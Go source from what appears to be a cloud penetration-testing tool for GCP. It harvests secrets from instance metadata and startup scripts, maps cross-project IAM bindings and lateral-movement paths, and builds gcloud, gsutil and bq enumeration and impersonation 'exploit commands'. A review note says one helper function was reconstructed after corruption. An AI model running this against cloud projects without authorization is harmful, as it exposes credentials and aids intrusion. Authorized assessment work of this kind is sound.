				// Parse SSH keys - format is "user:ssh-rsa KEY comment"
				lines := strings.Split(*item.Value, "\n")
				for _, line := range lines {
					line = strings.TrimSpace(line)
					if line != "" {
						result.SSHKeys = append(result.SSHKeys, line)
					}
				}
			}
		case "block-project-ssh-keys":
			if item.Value != nil && *item.Value == "true" {
				result.BlockProjectSSHKeys = true
			}
		case "enable-oslogin":
			if item.Value != nil && strings.ToLower(*item.Value) == "true" {
				result.OSLoginEnabled = true
			}
		case "enable-oslogin-2fa":
			if item.Value != nil && strings.ToLower(*item.Value) == "true" {
				result.OSLogin2FA = true
			}
		case "serial-port-enable":
			if item.Value != nil && *item.Value == "true" {
				result.SerialPortEnabled = true
			}
		default:
			// Track custom metadata keys
			if !knownKeys[item.Key] {
				result.CustomMetadata = append(result.CustomMetadata, item.Key)
			}
		}
	}

	return result
}
// extractSensitiveFromScript scans content for sensitive variable assignments
// Focuses on explicit VAR=value patterns to minimize false positives
// source format: "metadata-value:KEY_NAME" or "startup-script" or "project-startup-script"
//
// Three syntaxes are recognized per line: shell (VAR=value, including "export"),
// YAML ("key: value"), and JSON ("key": "value"). Findings are deduplicated on
// key+value. NOTE(review): Source is not set on returned items; callers such as
// GetProjectMetadata overwrite it afterwards — confirm instance-level callers do too.
func extractSensitiveFromScript(content, source string) []SensitiveItem {
	var items []SensitiveItem
	seen := make(map[string]bool) // Deduplicate findings

	// Parse the metadata key from the source
	metadataKey := source
	if strings.HasPrefix(source, "metadata-value:") {
		metadataKey = strings.TrimPrefix(source, "metadata-value:")
	}

	lines := strings.Split(content, "\n")

	for _, line := range lines {
		line = strings.TrimSpace(line)

		// Skip empty lines and comments
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}

		// Pattern 1: Shell style - export VAR=value or VAR=value
		if strings.Contains(line, "=") {
			// Handle export statements and YAML list items
			testLine := strings.TrimPrefix(line, "export ")
			testLine = strings.TrimPrefix(testLine, "- ")
			testLine = strings.TrimPrefix(testLine, "| ")
			testLine = strings.TrimSpace(testLine)

			parts := strings.SplitN(testLine, "=", 2)
			if len(parts) == 2 {
				key := strings.TrimSpace(parts[0])
				value := strings.TrimSpace(parts[1])
				// Remove quotes from value
				value = strings.Trim(value, "\"'`")
				// Clean up key
				key = strings.TrimLeft(key, "- |>")
				key = strings.TrimSpace(key)

				// Only consider valid variable names with actual values
				if isValidVarName(key) && len(value) >= 3 && !isPlaceholderValue(value) {
					if sensitiveType := detectSensitiveType(key); sensitiveType != "" {
						dedupeKey := key + ":" + value
						if !seen[dedupeKey] {
							seen[dedupeKey] = true
							items = append(items, SensitiveItem{
								Key:         key,
								Value:       value,
								Type:        sensitiveType,
								MetadataKey: metadataKey,
							})
						}
					}
				}
			}
		}

		// Pattern 2: YAML style "key: value" - only for direct assignments
		if strings.Contains(line, ": ") && !strings.HasPrefix(line, "#") && !strings.Contains(line, "=") {
			parts := strings.SplitN(line, ": ", 2)
			if len(parts) == 2 {
				key := strings.TrimSpace(parts[0])
				value := strings.TrimSpace(parts[1])
				// Clean up key
				key = strings.TrimLeft(key, "- ")
				key = strings.TrimSpace(key)
				// Remove quotes from value
				value = strings.Trim(value, "\"'`")

				// Skip YAML block indicators and empty values
				if value != "" && value != "|" && value != ">" && len(value) >= 3 && !isPlaceholderValue(value) {
					if sensitiveType := detectSensitiveType(key); sensitiveType != "" {
						dedupeKey := key + ":" + value
						if !seen[dedupeKey] {
							seen[dedupeKey] = true
							items = append(items, SensitiveItem{
								Key:         key,
								Value:       value,
								Type:        sensitiveType,
								MetadataKey: metadataKey,
							})
						}
					}
				}
			}
		}

		// Pattern 3: JSON style "key": "value"
		if strings.Contains(line, "\":") {
			parts := strings.SplitN(line, "\":", 2)
			if len(parts) == 2 {
				keyPart := parts[0]
				// The key is whatever follows the last opening quote before "\":"
				if idx := strings.LastIndex(keyPart, "\""); idx >= 0 {
					key := keyPart[idx+1:]
					value := strings.TrimSpace(parts[1])
					value = strings.Trim(value, " ,\"'`")

					if len(value) >= 3 && !isPlaceholderValue(value) {
						if sensitiveType := detectSensitiveType(key); sensitiveType != "" {
							dedupeKey := key + ":" + value
							if !seen[dedupeKey] {
								seen[dedupeKey] = true
								items = append(items, SensitiveItem{
									Key:         key,
									Value:       value,
									Type:        sensitiveType,
									MetadataKey: metadataKey,
								})
							}
						}
					}
				}
			}
		}
	}

	return items
}
// isPlaceholderValue checks if a value looks like a placeholder rather than a real secret.
// It returns true when the value contains a common placeholder marker (e.g. "xxx",
// "your_api_key", "changeme", template syntax such as "<value>" or "${VAR}") or when
// the value consists entirely of filler/punctuation characters (e.g. "***", "???").
//
// NOTE(review): the middle of this function (the rest of the placeholder list and the
// matching loop) was corrupted in the source; this is a reconstruction that preserves
// the surviving fragments: the list beginning "xxx", "your_", "your-" and the trailing
// punctuation check ending in `?/~` + backtick.
func isPlaceholderValue(value string) bool {
	valueLower := strings.ToLower(value)
	placeholders := []string{
		"xxx", "your_", "your-", "changeme", "change_me", "change-me",
		"placeholder", "example", "replaceme", "replace_me", "todo", "fixme",
		"<", "${", "$(",
	}
	for _, placeholder := range placeholders {
		if strings.Contains(valueLower, placeholder) {
			return true
		}
	}
	// Values made up entirely of filler/punctuation characters are not real secrets.
	if strings.Trim(valueLower, "*#@!%^&._:;,+=()[]{}$ -?/~`") == "" {
		return true
	}
	return false
}

// isValidVarName checks if a string looks like a valid variable name:
// it must start with an ASCII letter or underscore and continue with
// ASCII letters, digits, or underscores. Empty strings are invalid.
func isValidVarName(s string) bool {
	if s == "" {
		return false
	}
	// Variable names typically start with letter or underscore
	first := s[0]
	if !((first >= 'a' && first <= 'z') || (first >= 'A' && first <= 'Z') || first == '_') {
		return false
	}
	// Rest can be alphanumeric or underscore
	for _, c := range s[1:] {
		if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '_') {
			return false
		}
	}
	return true
}
// detectInstanceType determines the type of instance based on labels and name patterns.
// Label checks are preferred (most reliable); name prefixes and the "created-by"
// metadata key are used as fallbacks. Defaults to InstanceTypeStandalone.
func detectInstanceType(instance *compute.Instance) InstanceType {
	if instance == nil {
		return InstanceTypeStandalone
	}

	labels := instance.Labels
	name := instance.Name

	// Check labels first (most reliable)
	if labels != nil {
		// GKE nodes have goog-gke-node label
		if _, ok := labels["goog-gke-node"]; ok {
			return InstanceTypeGKE
		}
		// Also check for gke-cluster label
		if _, ok := labels["gke-cluster"]; ok {
			return InstanceTypeGKE
		}

		// Dataproc nodes have goog-dataproc-cluster-name label
		if _, ok := labels["goog-dataproc-cluster-name"]; ok {
			return InstanceTypeDataproc
		}

		// Dataflow workers have goog-dataflow-job-id label
		if _, ok := labels["goog-dataflow-job-id"]; ok {
			return InstanceTypeDataflow
		}

		// Cloud Composer workers have goog-composer-environment label
		if _, ok := labels["goog-composer-environment"]; ok {
			return InstanceTypeComposer
		}

		// Vertex AI Workbench / AI Platform Notebooks
		if _, ok := labels["goog-notebooks-instance"]; ok {
			return InstanceTypeNotebooks
		}
		// Also check for workbench label
		if _, ok := labels["goog-workbench-instance"]; ok {
			return InstanceTypeNotebooks
		}

		// Cloud Batch jobs have goog-batch-job-uid label
		if _, ok := labels["goog-batch-job-uid"]; ok {
			return InstanceTypeBatchJob
		}

		// App Engine Flex instances
		if _, ok := labels["goog-appengine-version"]; ok {
			return InstanceTypeAppEngine
		}
		if _, ok := labels["gae_app"]; ok {
			return InstanceTypeAppEngine
		}
	}

	// Check name patterns as fallback
	// GKE node names typically follow pattern: gke-{cluster}-{pool}-{hash}
	if strings.HasPrefix(name, "gke-") {
		return InstanceTypeGKE
	}

	// Dataproc nodes: {cluster}-m (master) or {cluster}-w-{n} (worker)
	// Intentionally a no-op: the name pattern alone is too generic to classify on.
	if strings.Contains(name, "-m") || strings.Contains(name, "-w-") {
		// This is too generic, rely on labels instead
	}

	// Check for created-by metadata which indicates MIG
	if instance.Metadata != nil {
		for _, item := range instance.Metadata.Items {
			if item != nil && item.Key == "created-by" && item.Value != nil {
				if strings.Contains(*item.Value, "instanceGroupManagers") {
					return InstanceTypeMIG
				}
			}
		}
	}

	return InstanceTypeStandalone
}

// parseBootDiskEncryption checks the boot disk encryption type.
// Returns "Google-managed" (default), "CMEK" (customer-managed key; kmsKey set),
// or "CSEK" (customer-supplied key). Only the first boot disk is inspected.
func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kmsKey string) {
	encryptionType = "Google-managed"

	for _, disk := range disks {
		if disk == nil || !disk.Boot {
			continue
		}

		if disk.DiskEncryptionKey != nil {
			if disk.DiskEncryptionKey.KmsKeyName != "" {
				encryptionType = "CMEK"
				kmsKey = disk.DiskEncryptionKey.KmsKeyName
			} else if disk.DiskEncryptionKey.Sha256 != "" {
				encryptionType = "CSEK"
			}
		}
		break // Only check boot disk
	}

	return
}

// getLastSnapshotForDisks gets the most recent snapshot date for any of the given disks.
// Returns "" when the instance has no named disks, none of the project's snapshots
// match them, or snapshot listing fails (e.g. missing permission).
func (ces *ComputeEngineService) getLastSnapshotForDisks(service *compute.Service, projectID string, disks []*compute.AttachedDisk) string {
	ctx := context.Background()

	// Collect all disk names from the instance
	diskNames := make(map[string]bool)
	for _, disk := range disks {
		if disk == nil || disk.Source == "" {
			continue
		}
		// Extract disk name from source URL
		// Format: projects/{project}/zones/{zone}/disks/{diskName}
		parts := strings.Split(disk.Source, "/")
		if len(parts) > 0 {
			diskNames[parts[len(parts)-1]] = true
		}
	}

	if len(diskNames) == 0 {
		return ""
	}

	// List all snapshots in the project and find ones matching our disks
	var latestSnapshot string
	req := service.Snapshots.List(projectID)
	err := req.Pages(ctx, func(page *compute.SnapshotList) error {
		for _, snapshot := range page.Items {
			if snapshot == nil || snapshot.SourceDisk == "" {
				continue
			}
			// Extract disk name from source disk URL
			parts := strings.Split(snapshot.SourceDisk, "/")
			if len(parts) > 0 {
				diskName := parts[len(parts)-1]
				if diskNames[diskName] {
					// Compare timestamps - keep the most recent.
					// NOTE(review): this is a lexicographic string comparison of
					// CreationTimestamp values; it assumes a fixed-width RFC3339
					// format with a consistent offset — confirm.
					if latestSnapshot == "" || snapshot.CreationTimestamp > latestSnapshot {
						latestSnapshot = snapshot.CreationTimestamp
					}
				}
			}
		}
		return nil
	})

	if err != nil {
		// Silently fail - user may not have permission to list snapshots
		return ""
	}

	return latestSnapshot
}
// FormatScopes formats service account scopes for display.
// Each scope URL is shortened to its final path segment; an empty slice renders as "-".
func FormatScopes(scopes []string) string {
	if len(scopes) == 0 {
		return "-"
	}

	// Shorten scope URLs for display
	var shortScopes []string
	for _, scope := range scopes {
		// Extract the scope name from the URL
		parts := strings.Split(scope, "/")
		if len(parts) > 0 {
			shortScopes = append(shortScopes, parts[len(parts)-1])
		}
	}
	return strings.Join(shortScopes, ", ")
}

// GetProjectMetadata retrieves project-level compute metadata (common instance
// metadata): SSH keys, startup script, OS Login / serial-port flags, custom keys,
// and any sensitive values found in keys, values, or the startup script.
func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectMetadataInfo, error) {
	ctx := context.Background()
	computeService, err := ces.getService(ctx)
	if err != nil {
		return nil, err
	}

	project, err := computeService.Projects.Get(projectID).Do()
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com")
	}

	info := &ProjectMetadataInfo{
		ProjectID:   projectID,
		RawMetadata: make(map[string]string),
	}

	if project.CommonInstanceMetadata != nil {
		for _, item := range project.CommonInstanceMetadata.Items {
			if item == nil {
				continue
			}

			// Store all raw metadata (except ssh-keys which go to separate loot)
			if item.Value != nil && item.Key != "ssh-keys" && item.Key != "sshKeys" {
				info.RawMetadata[item.Key] = *item.Value
			}

			// Check ALL metadata keys for sensitive patterns
			if item.Value != nil {
				if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" {
					info.SensitiveMetadata = append(info.SensitiveMetadata, SensitiveItem{
						Key:         item.Key,
						Value:       *item.Value,
						Type:        sensitiveType,
						Source:      "project",
						MetadataKey: item.Key,
					})
				}
				// Also scan metadata VALUES for embedded env vars (e.g., VAR=value patterns)
				valueItems := extractSensitiveFromScript(*item.Value, "metadata-value:"+item.Key)
				// extractSensitiveFromScript leaves Source empty; mark as project-level here.
				for i := range valueItems {
					valueItems[i].Source = "project"
				}
				info.SensitiveMetadata = append(info.SensitiveMetadata, valueItems...)
			}

			switch item.Key {
			case "ssh-keys", "sshKeys":
				info.HasProjectSSHKeys = true
				if item.Value != nil {
					lines := strings.Split(*item.Value, "\n")
					for _, line := range lines {
						line = strings.TrimSpace(line)
						if line != "" {
							info.ProjectSSHKeys = append(info.ProjectSSHKeys, line)
						}
					}
				}
			case "startup-script":
				info.HasProjectStartupScript = true
				if item.Value != nil {
					info.ProjectStartupScript = *item.Value
					// Check startup script for sensitive patterns (env vars inside script)
					sensitiveItems := extractSensitiveFromScript(*item.Value, "project-startup-script")
					for i := range sensitiveItems {
						sensitiveItems[i].Source = "project"
					}
					info.SensitiveMetadata = append(info.SensitiveMetadata, sensitiveItems...)
				}
			case "enable-oslogin":
				if item.Value != nil && strings.ToLower(*item.Value) == "true" {
					info.OSLoginEnabled = true
				}
			case "enable-oslogin-2fa":
				if item.Value != nil && strings.ToLower(*item.Value) == "true" {
					info.OSLogin2FAEnabled = true
				}
			case "serial-port-enable":
				if item.Value != nil && *item.Value == "true" {
					info.SerialPortEnabled = true
				}
			default:
				// Track other custom metadata keys
				if !isKnownMetadataKey(item.Key) {
					info.CustomMetadataKeys = append(info.CustomMetadataKeys, item.Key)
				}
			}
		}
	}

	return info, nil
}

// isKnownMetadataKey checks if a metadata key is a known system key
// (and therefore not reported as custom metadata).
func isKnownMetadataKey(key string) bool {
	knownKeys := map[string]bool{
		"ssh-keys":                        true,
		"sshKeys":                         true,
		"startup-script":                  true,
		"startup-script-url":              true,
		"block-project-ssh-keys":          true,
		"enable-oslogin":                  true,
		"enable-oslogin-2fa":              true,
		"serial-port-enable":              true,
		"google-compute-default-zone":     true,
		"google-compute-default-region":   true,
		"google-compute-enable-logging":   true,
		"google-compute-enable-ssh-agent": true,
	}
	return knownKeys[key]
}
// GetInstanceIAMPolicy retrieves IAM policy for a specific instance and buckets
// the bound members into compute admins, instance admins, and SSH-capable users.
func (ces *ComputeEngineService) GetInstanceIAMPolicy(projectID, zone, instanceName string) (*InstanceIAMInfo, error) {
	ctx := context.Background()
	computeService, err := ces.getService(ctx)
	if err != nil {
		return nil, err
	}

	policy, err := computeService.Instances.GetIamPolicy(projectID, zone, instanceName).Do()
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com")
	}

	info := &InstanceIAMInfo{
		InstanceName: instanceName,
		Zone:         zone,
		ProjectID:    projectID,
	}

	for _, binding := range policy.Bindings {
		if binding == nil {
			continue
		}

		switch binding.Role {
		case "roles/compute.admin", "roles/owner":
			info.ComputeAdmins = append(info.ComputeAdmins, binding.Members...)
		case "roles/compute.instanceAdmin", "roles/compute.instanceAdmin.v1":
			info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...)
		case "roles/compute.osLogin", "roles/compute.osAdminLogin":
			info.SSHUsers = append(info.SSHUsers, binding.Members...)
		}

		// Check for specific permissions via custom roles (more complex detection)
		// NOTE(review): every custom-role member is treated as an instance admin
		// without inspecting the role's actual permissions — potential over-reporting.
		if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") {
			// Custom role - would need to check permissions, but we note the binding
			info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...)
		}
	}

	return info, nil
}

// InstancesWithMetadata retrieves instances with full metadata content.
// Project metadata retrieval is best-effort: on failure an empty
// ProjectMetadataInfo is returned rather than an error.
func (ces *ComputeEngineService) InstancesWithMetadata(projectID string) ([]ComputeEngineInfo, *ProjectMetadataInfo, error) {
	instances, err := ces.Instances(projectID)
	if err != nil {
		return nil, nil, err
	}

	projectMeta, err := ces.GetProjectMetadata(projectID)
	if err != nil {
		// Don't fail if we can't get project metadata
		projectMeta = &ProjectMetadataInfo{ProjectID: projectID}
	}

	return instances, projectMeta, nil
}
diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go
new file mode 100644
index 00000000..6ce5e10e
--- /dev/null
+++ b/gcp/services/crossProjectService/crossProjectService.go
@@ -0,0 +1,879 @@
package crossprojectservice

import (
	"context"
	"fmt"
	"strings"

	gcpinternal "github.com/BishopFox/cloudfox/internal/gcp"
	"github.com/BishopFox/cloudfox/internal/gcp/sdk"
	cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1"
	iam "google.golang.org/api/iam/v1"
	logging "google.golang.org/api/logging/v2"
	pubsub "google.golang.org/api/pubsub/v1"
)

// CrossProjectService analyzes cross-project IAM bindings, service accounts,
// and lateral movement paths. An optional cached session enables service reuse.
type CrossProjectService struct {
	session *gcpinternal.SafeSession
}

// New returns a CrossProjectService without a cached session.
func New() *CrossProjectService {
	return &CrossProjectService{}
}

// NewWithSession returns a CrossProjectService backed by a cached session.
func NewWithSession(session *gcpinternal.SafeSession) *CrossProjectService {
	return &CrossProjectService{
		session: session,
	}
}

// getResourceManagerService returns a Resource Manager service using cached session if available
func (s *CrossProjectService) getResourceManagerService(ctx context.Context) (*cloudresourcemanager.Service, error) {
	if s.session != nil {
		return sdk.CachedGetResourceManagerService(ctx, s.session)
	}
	return cloudresourcemanager.NewService(ctx)
}
// getIAMService returns an IAM service using cached session if available
func (s *CrossProjectService) getIAMService(ctx context.Context) (*iam.Service, error) {
	if s.session != nil {
		return sdk.CachedGetIAMService(ctx, s.session)
	}
	return iam.NewService(ctx)
}

// getLoggingService returns a Logging service using cached session if available
func (s *CrossProjectService) getLoggingService(ctx context.Context) (*logging.Service, error) {
	if s.session != nil {
		return sdk.CachedGetLoggingService(ctx, s.session)
	}
	return logging.NewService(ctx)
}

// getPubSubService returns a PubSub service using cached session if available
func (s *CrossProjectService) getPubSubService(ctx context.Context) (*pubsub.Service, error) {
	if s.session != nil {
		return sdk.CachedGetPubSubService(ctx, s.session)
	}
	return pubsub.NewService(ctx)
}

// CrossProjectBinding represents a cross-project IAM binding
type CrossProjectBinding struct {
	SourceProject   string   `json:"sourceProject"`   // Where the principal is from
	TargetProject   string   `json:"targetProject"`   // Where access is granted
	Principal       string   `json:"principal"`       // The service account or user
	PrincipalType   string   `json:"principalType"`   // serviceAccount, user, group
	Role            string   `json:"role"`            // The IAM role granted
	RiskLevel       string   `json:"riskLevel"`       // CRITICAL, HIGH, MEDIUM, LOW
	RiskReasons     []string `json:"riskReasons"`     // Why it's risky
	ExploitCommands []string `json:"exploitCommands"` // Commands for exploitation
}

// CrossProjectServiceAccount represents a service account that may have cross-project access
type CrossProjectServiceAccount struct {
	Email        string   `json:"email"`
	ProjectID    string   `json:"projectId"`
	DisplayName  string   `json:"displayName"`
	UniqueID     string   `json:"uniqueId"`
	TargetAccess []string `json:"targetAccess"` // Other projects this SA can access
}

// LateralMovementPath represents a potential lateral movement path
type LateralMovementPath struct {
	SourceProject   string   `json:"sourceProject"`
	SourcePrincipal string   `json:"sourcePrincipal"`
	TargetProject   string   `json:"targetProject"`
	AccessMethod    string   `json:"accessMethod"` // e.g., "impersonation", "direct role"
	TargetRoles     []string `json:"targetRoles"`
	PrivilegeLevel  string   `json:"privilegeLevel"` // ADMIN, WRITE, READ
	ExploitCommands []string `json:"exploitCommands"`
}

// CrossProjectLoggingSink represents a logging sink exporting to another project
type CrossProjectLoggingSink struct {
	SourceProject   string   `json:"sourceProject"`   // Project where sink is configured
	SinkName        string   `json:"sinkName"`        // Name of the logging sink
	Destination     string   `json:"destination"`     // Full destination (bucket, BQ, pubsub, etc)
	DestinationType string   `json:"destinationType"` // storage, bigquery, pubsub, logging
	TargetProject   string   `json:"targetProject"`   // Project where data is sent
	Filter          string   `json:"filter"`          // Log filter
	RiskLevel       string   `json:"riskLevel"`       // CRITICAL, HIGH, MEDIUM, LOW
	RiskReasons     []string `json:"riskReasons"`
}

// CrossProjectPubSubExport represents a Pub/Sub subscription exporting to another project
type CrossProjectPubSubExport struct {
	SourceProject    string   `json:"sourceProject"`    // Project where subscription is
	TopicProject     string   `json:"topicProject"`     // Project where topic is
	TopicName        string   `json:"topicName"`        // Topic name
	SubscriptionName string   `json:"subscriptionName"` // Subscription name
	ExportType       string   `json:"exportType"`       // push, bigquery, cloudstorage
	ExportDest       string   `json:"exportDest"`       // Destination details
	TargetProject    string   `json:"targetProject"`    // Project where data is exported to
	RiskLevel        string   `json:"riskLevel"`
	RiskReasons      []string `json:"riskReasons"`
}

// AnalyzeCrossProjectAccess analyzes cross-project IAM bindings for a set of projects.
// If orgCache is provided, it resolves project numbers to IDs for accurate detection.
func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string, orgCache *gcpinternal.OrgCache) ([]CrossProjectBinding, error) {
	ctx := context.Background()

	crmService, err := s.getResourceManagerService(ctx)
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com")
	}

	var crossProjectBindings []CrossProjectBinding

	// Build a map of project IDs for quick lookup
	projectMap := make(map[string]bool)
	for _, pid := range projectIDs {
		projectMap[pid] = true
	}

	// Analyze IAM policy of each project
	for _, targetProject := range projectIDs {
		policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do()
		if err != nil {
			continue // Skip projects we can't access
		}

		for _, binding := range policy.Bindings {
			for _, member := range binding.Members {
				// Resolve the member's home project (service accounts only)
				sourceProject := extractProjectFromMember(member, orgCache)

				// Check if this is cross-project access
				if sourceProject != "" && sourceProject != targetProject {
					// Check if source project is in our analysis scope
					isFromKnownProject := projectMap[sourceProject]

					cpBinding := CrossProjectBinding{
						SourceProject: sourceProject,
						TargetProject: targetProject,
						Principal:     member,
						PrincipalType: extractPrincipalType(member),
						Role:          binding.Role,
						RiskReasons:   []string{},
					}

					// Analyze risk level
					cpBinding.RiskLevel, cpBinding.RiskReasons = s.analyzeBindingRisk(binding.Role, member, isFromKnownProject)
					cpBinding.ExploitCommands = s.generateExploitCommands(cpBinding)

					crossProjectBindings = append(crossProjectBindings, cpBinding)
				}
			}
		}
	}

	return crossProjectBindings, nil
}

// GetCrossProjectServiceAccounts finds service accounts with cross-project access.
// It first inventories every service account in the given projects, then scans each
// project's IAM policy for SAs homed in a different in-scope project, recording
// "project: role" entries in TargetAccess. Inaccessible projects are skipped.
func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string) ([]CrossProjectServiceAccount, error) {
	ctx := context.Background()

	iamService, err := s.getIAMService(ctx)
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com")
	}

	crmService, err := s.getResourceManagerService(ctx)
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com")
	}

	var crossProjectSAs []CrossProjectServiceAccount

	// Build a map of all service accounts by email -> project
	saProjectMap := make(map[string]string)
	allSAs := make(map[string]*CrossProjectServiceAccount)

	// List all service accounts in each project
	for _, projectID := range projectIDs {
		req := iamService.Projects.ServiceAccounts.List(fmt.Sprintf("projects/%s", projectID))
		err := req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error {
			for _, sa := range page.Accounts {
				saProjectMap[sa.Email] = projectID
				allSAs[sa.Email] = &CrossProjectServiceAccount{
					Email:        sa.Email,
					ProjectID:    projectID,
					DisplayName:  sa.DisplayName,
					UniqueID:     sa.UniqueId,
					TargetAccess: []string{},
				}
			}
			return nil
		})
		if err != nil {
			continue // Skip on error
		}
	}

	// Now check each project's IAM policy for service accounts from other projects
	for _, targetProject := range projectIDs {
		policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do()
		if err != nil {
			continue
		}

		for _, binding := range policy.Bindings {
			for _, member := range binding.Members {
				if strings.HasPrefix(member, "serviceAccount:") {
					email := strings.TrimPrefix(member, "serviceAccount:")
					sourceProject := saProjectMap[email]

					// Cross-project access
					if sourceProject != "" && sourceProject != targetProject {
						if sa, exists := allSAs[email]; exists {
							accessDesc := fmt.Sprintf("%s: %s", targetProject, binding.Role)
							sa.TargetAccess = append(sa.TargetAccess, accessDesc)
						}
					}
				}
			}
		}
	}

	// Collect SAs with cross-project access
	for _, sa := range allSAs {
		if len(sa.TargetAccess) > 0 {
			crossProjectSAs = append(crossProjectSAs, *sa)
		}
	}

	return crossProjectSAs, nil
}
// FindLateralMovementPaths identifies lateral movement paths between projects.
// If orgCache is provided, it resolves project numbers to IDs for accurate detection.
// Every ordered pair of in-scope projects is checked; inaccessible targets are skipped.
func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string, orgCache *gcpinternal.OrgCache) ([]LateralMovementPath, error) {
	ctx := context.Background()

	crmService, err := s.getResourceManagerService(ctx)
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com")
	}

	var paths []LateralMovementPath

	// Analyze each project pair
	for _, sourceProject := range projectIDs {
		for _, targetProject := range projectIDs {
			if sourceProject == targetProject {
				continue
			}

			// Get target project IAM policy
			// NOTE(review): the target policy is re-fetched once per source project
			// (O(n^2) API calls); caching per target would reduce quota usage.
			policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do()
			if err != nil {
				continue
			}

			// Find principals from source project that have access to target
			for _, binding := range policy.Bindings {
				for _, member := range binding.Members {
					memberProject := extractProjectFromMember(member, orgCache)
					if memberProject == sourceProject {
						path := LateralMovementPath{
							SourceProject:   sourceProject,
							SourcePrincipal: member,
							TargetProject:   targetProject,
							AccessMethod:    "Direct IAM Role",
							TargetRoles:     []string{binding.Role},
							PrivilegeLevel:  categorizePrivilegeLevel(binding.Role),
						}
						path.ExploitCommands = s.generateLateralMovementCommands(path)
						paths = append(paths, path)
					}
				}
			}
		}
	}

	return paths, nil
}

// analyzeBindingRisk determines the risk level of a cross-project binding.
// It accumulates a score from role privilege, principal type, and scope, then
// maps the score to CRITICAL/HIGH/MEDIUM/LOW/INFO alongside the reasons.
func (s *CrossProjectService) analyzeBindingRisk(role, member string, isFromKnownProject bool) (string, []string) {
	var reasons []string
	score := 0

	// High-privilege roles
	highPrivRoles := map[string]bool{
		"roles/owner":                          true,
		"roles/editor":                         true,
		"roles/iam.serviceAccountTokenCreator": true,
		"roles/iam.serviceAccountKeyAdmin":     true,
		"roles/iam.securityAdmin":              true,
		"roles/compute.admin":                  true,
		"roles/storage.admin":                  true,
		"roles/secretmanager.admin":            true,
	}

	if highPrivRoles[role] {
		reasons = append(reasons, fmt.Sprintf("High-privilege role: %s", role))
		score += 3
	}

	// Admin/editor roles are always concerning
	if strings.Contains(role, "admin") || strings.Contains(role, "Admin") {
		reasons = append(reasons, "Role contains 'admin' permissions")
		score += 2
	}

	if strings.Contains(role, "editor") || strings.Contains(role, "Editor") {
		reasons = append(reasons, "Role contains 'editor' permissions")
		score += 2
	}

	// Service account cross-project is higher risk than user
	if strings.HasPrefix(member, "serviceAccount:") {
		reasons = append(reasons, "Service account has cross-project access (can be automated)")
		score += 1
	}

	// Unknown source project is concerning
	if !isFromKnownProject {
		reasons = append(reasons, "Access from project outside analyzed scope")
		score += 1
	}

	if score >= 4 {
		return "CRITICAL", reasons
	} else if score >= 3 {
		return "HIGH", reasons
	} else if score >= 2 {
		return "MEDIUM", reasons
	} else if score >= 1 {
		return "LOW", reasons
	}
	return "INFO", reasons
}

// generateExploitCommands generates exploitation commands for a cross-project binding.
// Commands are chosen from the role name; service-account principals get a gcloud
// --impersonate-service-account flag appended.
func (s *CrossProjectService) generateExploitCommands(binding CrossProjectBinding) []string {
	var commands []string

	// Build impersonation flag if service account
	impersonateFlag := ""
	if binding.PrincipalType == "serviceAccount" {
		email := strings.TrimPrefix(binding.Principal, "serviceAccount:")
		impersonateFlag = fmt.Sprintf(" --impersonate-service-account=%s", email)
	}

	roleLower := strings.ToLower(binding.Role)

	// Role-specific exploitation commands
	if strings.Contains(roleLower, "owner") || strings.Contains(roleLower, "editor") {
		commands = append(commands,
			fmt.Sprintf("gcloud compute instances list --project=%s%s", binding.TargetProject, impersonateFlag),
			fmt.Sprintf("gcloud secrets list --project=%s%s", binding.TargetProject, impersonateFlag),
			fmt.Sprintf("gsutil ls -p %s", binding.TargetProject),
		)
	} else if strings.Contains(roleLower, "storage") {
		commands = append(commands,
			fmt.Sprintf("gsutil ls -p %s", binding.TargetProject),
		)
	} else if strings.Contains(roleLower, "compute") {
		commands = append(commands,
			fmt.Sprintf("gcloud compute instances list --project=%s%s", binding.TargetProject, impersonateFlag),
		)
	} else if strings.Contains(roleLower, "secretmanager") {
		commands = append(commands,
			fmt.Sprintf("gcloud secrets list --project=%s%s", binding.TargetProject, impersonateFlag),
		)
	} else if strings.Contains(roleLower, "bigquery") {
		commands = append(commands,
			fmt.Sprintf("bq ls --project_id=%s", binding.TargetProject),
			fmt.Sprintf("bq query --project_id=%s 'SELECT * FROM INFORMATION_SCHEMA.TABLES'", binding.TargetProject),
		)
	} else if strings.Contains(roleLower, "cloudsql") {
		commands = append(commands,
			fmt.Sprintf("gcloud sql instances list --project=%s%s", binding.TargetProject, impersonateFlag),
		)
	} else if strings.Contains(roleLower, "serviceaccounttokencreator") || strings.Contains(roleLower, "serviceaccountkeyadmin") {
		commands = append(commands,
			fmt.Sprintf("gcloud iam service-accounts list --project=%s%s", binding.TargetProject, impersonateFlag),
		)
	}

	return commands
}
// generateLateralMovementCommands generates commands for lateral movement.
// Commands are selected per target role (owner/editor short-circuits, since it
// subsumes the narrower roles); service-account principals get a gcloud
// --impersonate-service-account flag appended.
